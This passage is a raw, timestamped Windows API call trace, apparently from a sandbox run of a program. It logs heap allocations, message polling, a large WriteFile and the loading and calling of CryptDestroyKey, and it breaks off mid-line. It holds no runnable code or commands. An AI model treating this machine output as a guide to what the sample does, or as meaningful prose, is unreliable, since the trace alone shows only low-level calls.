PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.411] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.411] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.413] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2b3e8*, nNumberOfBytesToWrite=0x153c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2b3e8*, lpNumberOfBytesWritten=0x8cf5e4*=0x153c8, lpOverlapped=0x0) returned 1 [0265.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0265.417] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0265.417] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.418] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e519e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0265.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.468] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0265.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.469] CryptDestroyKey (hKey=0xa872d0) returned 1 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0265.470] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.471] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.471] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.471] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.471] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0265.473] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.473] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0265.473] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0265.473] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0265.474] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.474] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.474] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: 